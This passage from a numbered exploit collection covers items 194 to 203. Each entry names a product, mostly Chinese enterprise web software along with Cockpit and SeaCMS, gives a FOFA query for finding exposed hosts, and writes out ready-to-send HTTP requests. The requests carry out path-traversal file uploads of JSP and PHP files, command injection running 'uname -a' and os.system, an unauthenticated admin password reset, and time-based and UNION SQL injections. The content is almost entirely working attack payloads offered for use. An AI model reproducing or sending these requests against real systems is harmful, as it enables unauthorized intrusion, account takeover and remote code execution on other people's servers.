GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive-webdav) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. FOUNDER (方正) Omni-media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the following request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
